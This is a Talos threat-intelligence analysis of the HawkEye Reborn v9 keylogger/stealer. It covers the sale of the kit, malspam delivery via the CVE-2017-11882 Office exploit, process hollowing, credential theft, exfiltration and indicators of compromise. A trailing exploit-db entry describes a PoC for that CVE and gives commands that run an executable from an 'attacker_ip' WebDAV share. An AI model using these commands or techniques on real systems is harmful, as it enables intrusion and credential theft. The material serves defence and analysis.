HawkEye is another example of a malware kit that is actively being marketed across various hacking forums. Over the past several months, Talos observed ongoing malware distribution campaigns attempting to leverage the latest version of the HawkEye keylogger/stealer, HawkEye Reborn v9, against organizations to steal sensitive information and account credentials for use in additional attacks and account compromise.

## History of HawkEye

HawkEye is a malware kit that has been around for several years and has seen continuous development and iterations since at least 2013. It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems. It features robust stealing capabilities, as it can be used to obtain sensitive information from a variety of different applications. This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP. Talos has recently identified several changes concerning HawkEye Reborn in the latest version, HawkEye Reborn v9.

In December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger.
[](<https://4.bp.blogspot.com/-YOKYK7nA_LY/XLSoPx3B5ZI/AAAAAAAABA4/nVJRW-hm9gwFnXSHqwa26gbdCOeKeCHRACLcBGAs/s1600/image28.png>)

Shortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward.

[](<https://2.bp.blogspot.com/-PfHSLXhS3v4/XLSoUi-yi5I/AAAAAAAABA8/NqfT1TqiwpwI-Tj1l_jE6N_RakRkUitMgCLcBGAs/s1600/image14.png>)

HawkEye Reborn v9 is currently marketed as an "Advance Monitoring Solution." It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model.

[](<https://3.bp.blogspot.com/-nVLC2xeWfVY/XLSoY_zVwmI/AAAAAAAABBA/ShgUQIkoEccFQNv-bKaJzZloYx-CmeL1wCLcBGAs/s1600/image19.png>)

HawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight. While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.

[](<https://1.bp.blogspot.com/-QjcANPSbXuw/XLSoeG7OXuI/AAAAAAAABBI/01cQGbAPI1AJHT_qLW26wZP62FMNLjhPQCLcBGAs/s1600/image23.png>)

Following these changes, the new developer of HawkEye Reborn has continued to make changes, and we expect this to continue as long as the developer can monetize their efforts.
[](<https://2.bp.blogspot.com/-XCF0ooXwiMQ/XLSojXSxjlI/AAAAAAAABBQ/EWx_PUY1XD0y1x7eMww8ZA675YR8IDQDQCLcBGAs/s1600/image21.png>)

As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or "for educational purposes," malicious attackers have been continuously leveraging it against various targets around the world.

## Distribution campaigns

For several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer. The current version, HawkEye Reborn v9, has been modified from earlier versions and heavily obfuscated to make analysis more difficult.

The email campaigns that have been observed feature characteristics consistent with what is commonly seen in malspam campaigns, with the emails purporting to be associated with various documents such as invoices, bills of materials, order confirmations, and other corporate functions. An example of one of these emails is below:

[](<https://4.bp.blogspot.com/-nnMClu2IVWQ/XLSonr4bazI/AAAAAAAABBY/-ux_RxNbshwLX1cR8plybcXGpjlp6PyegCLcBGAs/s1600/image7.jpg>)

**Figure 1: Example email message**

While the current email campaigns leverage malicious Microsoft Excel files, earlier campaigns have also been observed leveraging RTF and DOC files. Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.
[](<https://2.bp.blogspot.com/-QS6w_CksYJs/XLSosxC-zcI/AAAAAAAABBg/Mjq0cA5nUYIkcUJEQnYgAA27KhpICx4zgCLcBGAs/s1600/image24.png>)

**Figure 2: Example malicious Excel document**

Similar to the technique described in our previous blog about [Remcos](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>), the contents of the documents have been intentionally made to appear blurry, with the user being prompted to enable editing to have a clearer view of the contents.

Another interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos.

[](<https://4.bp.blogspot.com/-ucQKz5uGWps/XLSozJq9_cI/AAAAAAAABBo/FPmc6M0EjvgWn5B8KZr_qy9GkdM_LIkWgCLcBGAs/s1600/image13.jpg>)

**Figure 3: Document metadata**

Additionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of the Remcos distribution campaigns that were being observed throughout 2018.

Assuming the victim opens the attachment, the infection process begins as described in the following section.

Many of the distribution servers that are being used to host the HawkEye keylogger binaries retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections they are being used to facilitate. In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers.

## Analysis of HawkEye Reborn

The campaign starts with sending the aforementioned Excel sheets, which exploit the well-known [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) vulnerability, an arbitrary code execution bug in Microsoft Office.
The exploit works similarly to what we saw with [Agent Tesla](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>) in October. It leverages a buffer overflow in the Equation Editor, which occurs if someone hands over a font name that's too long. The shellcode starts after the MTEF font tag "08 13 36" in this case.

[](<https://2.bp.blogspot.com/-WxpBsP6lNWE/XLSo72CB_NI/AAAAAAAABBw/lwshDjqrrmwa1uNBL63iEJXMeCS2fPe5wCLcBGAs/s1600/image20.png>)

[](<https://4.bp.blogspot.com/-Ezp3PrHQB8A/XLSo_0PmDuI/AAAAAAAABB4/8Cmnfu03C4MFXU30HbMix6j2WLSa9oC9gCLcBGAs/s1600/image3.png>)

[](<https://1.bp.blogspot.com/-BPF8a9brsno/XLSpEO0fCKI/AAAAAAAABB8/aDnt1WNHhCQHZzG96-uuWb9biTU83DwRwCLcBGAs/s1600/image25.png>)

After execution in the Equation Editor (EQNEDT32.EXE) context, it downloads the malicious data from the malware server, as you can see in the ThreatGrid Process Timeline screenshot below. After a successful download, it creates and starts the RegAsm.exe process.

[](<https://3.bp.blogspot.com/-8C-Z3N_cEcE/XLSpIWEPIaI/AAAAAAAABCA/oAzHtM2VkH42DpaxRfozcgNRGAMWFWDUQCLcBGAs/s1600/image22.png>)

This RegAsm.exe process is a heavily obfuscated AutoIT script compiled into a PE. Even after decompiling it from the PE file, it remains heavily obfuscated and almost unreadable.

[](<https://2.bp.blogspot.com/-LAeWp4klBQM/XLSpNQSmlgI/AAAAAAAABCE/Taj11GUjky0vQyQkYi3-adDUhQwDhaq8ACLcBGAs/s1600/image16.png>)

We deobfuscated the script to understand how the infection process works. It first creates the "winrshost" mutex. Then, it extracts the final payload malware from two objects in the PE resource section (capisp1, appsruprov2).
[](<https://3.bp.blogspot.com/-LkoKmpYlZI8/XLSpSlAwVFI/AAAAAAAABCI/3imcGZdkdSYvAdyXyLULSvqBOIUWrzc1ACLcBGAs/s1600/image31.png>)

It concatenates them and uses AES to decrypt the result, using the hardcoded key "pydbdio…", which is handed over to the DecryptData function (see above). The screen capture below shows the decryption function.

[](<https://4.bp.blogspot.com/-KJKN9kXAelA/XLSpWqvttxI/AAAAAAAABCQ/6VvUkgSF91864qKaULizw0llm4Wat7_CwCLcBGAs/s1600/image30.png>)

It then calls the StartAndPatchRegAsm function.

[](<https://1.bp.blogspot.com/-VDSLuvBYhCE/XLSpacgofmI/AAAAAAAABCY/YK7E0pWtUpkaJEyZ_7AZrigJTR28NOU1gCLcBGAs/s1600/image5.png>)

This function tries to find the path of the original Microsoft RegAsm executable. It hands over the decrypted buffer extracted from the resource section and the path of the original RegAsm executable to the start_protect_hexcode function.

[](<https://4.bp.blogspot.com/-w-kCXgz3u0o/XLSpeBlFHnI/AAAAAAAABCg/JKhf2gJXxgQbeRTam8rQd2GPf10pYTpMwCLcBGAs/s1600/image18.png>)

[](<https://4.bp.blogspot.com/-ZTDot3VU9JU/XLSphqlp3mI/AAAAAAAABCk/bCasK40QdFAp0Gh4wVivdix4YJr-ZOCtgCLcBGAs/s1600/image26.png>)

Then it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable. This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process. The shellcode in HEXCODE1 is very similar to this [RunPE](<https://github.com/Zer0Mem0ry/RunPE/blob/master/RunPE.cpp>) example.

The AutoIT script offers many other functions that are not used in this campaign, such as anti-virtual-machine detection, USB drive infection and others.
[](<https://3.bp.blogspot.com/-vh6Xq3TzaqE/XLSqd44BI8I/AAAAAAAABC8/gyzDKfaB2LgXQ41UHSI30LB90bSp5h91QCLcBGAs/s1600/image29.png>)

[](<https://1.bp.blogspot.com/-IuVHzBC8njQ/XLSqhnzC8VI/AAAAAAAABDA/sOxJqPwVPKsiWUJKATHD0oUYlsAJbPInQCLcBGAs/s1600/image27.png>)

The final payload, which we found in the AutoIT PE file resource section and which was started by the process-hollowing shellcode, is a .NET PE file that's obfuscated with ConfuserEx.

[](<https://4.bp.blogspot.com/-u3hzMzatksk/XLSqmJo1I3I/AAAAAAAABDE/uGg8D0kUXDQzoWy8CP7zLIm210QMK3geQCLcBGAs/s1600/image17.png>)

Deobfuscated, we can see it is the HawkEye Keylogger, Reborn v9, Version=9.0.1.6.

When HawkEye is executed, in line 34,

    byte[] byte_ = gclass.method_0()["0", GClass30.GEnum3.RCDATA].Byte_0;

it reads the encrypted configuration from the RCDATA resource, and in line 33,

    byte[] byte_2 = GClass29.smethod_12(byte_, GClass12.string_0);

it decrypts this data with the Rijndael algorithm, which you can see below in the RijndaelManaged function, to initialize the HawkEye configuration settings.

[](<https://3.bp.blogspot.com/-iXF2q1vPsH0/XLSqqwTAYlI/AAAAAAAABDI/QmDPS_rDMvs2FAsIKCxge5wi1Ymvy_igACLcBGAs/s1600/image8.png>)

[](<https://1.bp.blogspot.com/-dBd_LGk0GoU/XLSqujXRU2I/AAAAAAAABDM/nepniWiNAvssUFbZVBvTGEDstHQE-LC2gCLcBGAs/s1600/image15.png>)

The decrypted configuration shows us the account used for exfiltration:

[](<https://1.bp.blogspot.com/-rHobq8SN4Ek/XLSq48SpP2I/AAAAAAAABDU/z81o8uAi_iUBte3aHusudOYT_dxsY0u0QCLcBGAs/s1600/image32.png>)

The main loop of HawkEye has the following functions:

[](<https://3.bp.blogspot.com/-W9wmLGo3GCc/XLSq9HXTuLI/AAAAAAAABDc/sEzmCGsiRl0bdeuCiodV5pX0ZGis4OkrACLcBGAs/s1600/image1.png>)

This shows the rich feature set of HawkEye. The adversaries can get detailed information about the victim's machine, as you can see in the screenshot below.
[](<https://1.bp.blogspot.com/-F1wPT8D1q04/XLSrBOdeGEI/AAAAAAAABDg/APiAE7rXSDsd8oJxaJgoQzUJjevl11gQgCLcBGAs/s1600/image11.png>)

Besides the system information, it steals passwords from common web browsers, Filezilla, Beyluxe Messenger, CoreFTP and the video game "Minecraft." It also starts a keylogger, steals clipboard content, takes screenshots of the desktop and pictures from the webcam.

Version 9 is still using the well-known MailPassView and WebBrowserPassView freeware tools from [Nirsoft](<http://www.nirsoft.net/>) to steal web and email passwords. These tools are embedded in the PE file as data that is decoded at runtime and added to the local resources. They are then run using the process hollowing technique to hide their execution inside the original Microsoft vbc.exe (Visual Basic Compiler) process: HawkEye starts an instance of vbc.exe via ProcessCreate, injects the tool and resumes the thread. The stolen passwords end up in a temporary file, which is read in and added to the list of data to be exfiltrated. HawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to the PanelURL API or ProxyURL.

[](<https://2.bp.blogspot.com/-yoXzehs_JDk/XLSrFzfBKRI/AAAAAAAABDk/JoTgkmSCuR0doPgen3wWwGnVQ2LnWlrrACLcBGAs/s1600/image9.png>)

As mentioned above in the comments of the main loop section, it also comes with several anti-analysis features, including starting an anti-debugging thread or disabling certain AV-related programs via the Image File Execution Options (IFEO) evasion technique, which registers invalid debuggers that redirect and effectively disable various system and security applications.
[](<https://4.bp.blogspot.com/-vjkuaPushUo/XLSrLErUWvI/AAAAAAAABDo/wTG74Vd6vPYKXhP0q0qaLukjx0vuxUvmQCLcBGAs/s1600/image6.png>)

[](<https://4.bp.blogspot.com/-Sp2PJW7BIq0/XLSrO9GaicI/AAAAAAAABDs/cLvxHbEJ2Oo70osruhvclw10eKOtRixKQCLcBGAs/s1600/image4.png>)

The following diagram summarizes the full infection process:

[](<https://3.bp.blogspot.com/-zR71sgOYtYA/XLSrT_-UJ2I/AAAAAAAABDw/H1shNR4H5z0G6xXb_h9hK23wowyd2ySngCLcBGAs/s1600/image12.jpg>)

## Conclusion

Recent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward. HawkEye has been active across the threat landscape for a long time and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts. While the Terms of Service have been written in an attempt to absolve the developer of any wrongdoing, it is actively leveraged by malicious adversaries. Organizations should be aware of this and similar threats and deploy countermeasures such as Multi-Factor Authentication (MFA) solutions like [Duo](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>) to help reduce the impact of credential theft within their environments. Talos continues to monitor this threat as it changes to ensure that customers remain protected from this and other threats as they continue to emerge and evolve.

## Coverage

Additional ways our customers can detect and block this threat are listed below.

[](<https://3.bp.blogspot.com/-mlMbcYQ3qsI/Wyn1AySpA-I/AAAAAAAAAZ4/nZhPWCs28ZcGmAw112w9dm8l47WVleUbwCLcBGAs/s1600/image1.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or Web Security Appliance ([WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks.

[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall ([NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)), Next-Generation Intrusion Prevention System ([NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.

[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## Indicators of compromise

The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of HawkEye Reborn v9 activity.
### Attachment hashes (SHA256)

A list of hashes observed to be associated with malicious email attachments can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4afcf1be50.txt>).

### PE32 hashes (SHA256)

A list of hashes observed to be associated with malicious PE32 executables can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4b004a5a27.txt>).

### Domains

The following domains have been observed to be associated with malware campaigns.

### IP addresses

The following IP addresses have been observed to be associated with malware campaigns.

### URLs

The following URLs have been observed to be associated with malware campaigns.

https[:]//a[.]pomf[.]cat/
http[:]//pomf[.]cat/upload[.]php

", "modified": "2019-04-16T11:45:39", "published": "2019-04-16T11:45:39", "id": "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/oyNpZ0C4orY/hawkeye-reborn.html", "type": "talosblog", "title": "New HawkEye Reborn Variant Emerges Following Ownership Change", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-11-21T03:00:56", "description": "Microsoft Office - OLE Remote Code Execution. CVE-2017-11882.
Remote exploit for Windows platform", "published": "2017-11-20T00:00:00", "type": "exploitdb", "title": "Microsoft Office - OLE Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2017-11-20T00:00:00", "id": "EDB-ID:43163", "href": "https://www.exploit-db.com/exploits/43163/", "sourceData": "

Source: https://github.com/embedi/CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers the WebClient service to start and execute a remote file from an attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of the executed command length. However, with the help of WebDav it is possible to launch an arbitrary attacker-controlled executable on the vulnerable machine. This script creates a simple document with several OLE objects. These objects exploit CVE-2017-11882, which results in sequential command execution.

The first command, which triggers the WebClient service start, may look like this:

cmd.exe /c start \\attacker_ip\ff

The attacker-controlled binary path should be a UNC network path:

\\attacker_ip\ff\1.exe

Usage

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

The example folder holds an .rtf file which exploits the CVE-2017-11882 vulnerability and runs the calculator on the system.

Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43163.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43163/"}]}